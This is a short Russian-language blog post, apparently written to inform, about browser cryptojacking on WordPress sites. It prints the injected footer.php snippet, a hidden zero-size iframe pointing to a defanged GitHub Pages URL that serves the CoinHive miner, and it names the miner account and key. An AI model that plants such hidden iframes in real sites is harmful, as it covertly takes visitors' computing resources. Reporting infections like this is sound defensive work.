С миру по нитке

Crypto Mining in Browser Из недавнего — майнинг криптовалют в броузере клиента. Казалось бы, много ли так намайнишь? Мало, но если уметь нагнать трафик, то, видимо, что-то и можно.

В подходящем месте темы, например footer.php, можно обнаружить нечто вроде этого (обфусцировано):

<iframe src="hxxps://wpupdates.github[.]io/ping/" style="width:0;heigh:0;border:none;"></iframe>

Malicious Cryptominers from GitHubЗа URLом кроется JavaScript, представляющий известный майнер CoinHive с именем пользователя MoneroU и ключом CZziRExmOxYEE65Hm4E9fycCuNqZH1G9. Относительно ново здесь использование публичной платформы Гитхаб. Вирус прикрывается, изображая некое WooCommerce Multilingual и ping service. Поскольку код выложен на гитхабе, можно ознакомиться и с кодом, и с историей изменений.

Если запустить на сервере антивирус, он определит этого злодея как JS:Miner-C [Trj].

Источник: VK.com

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *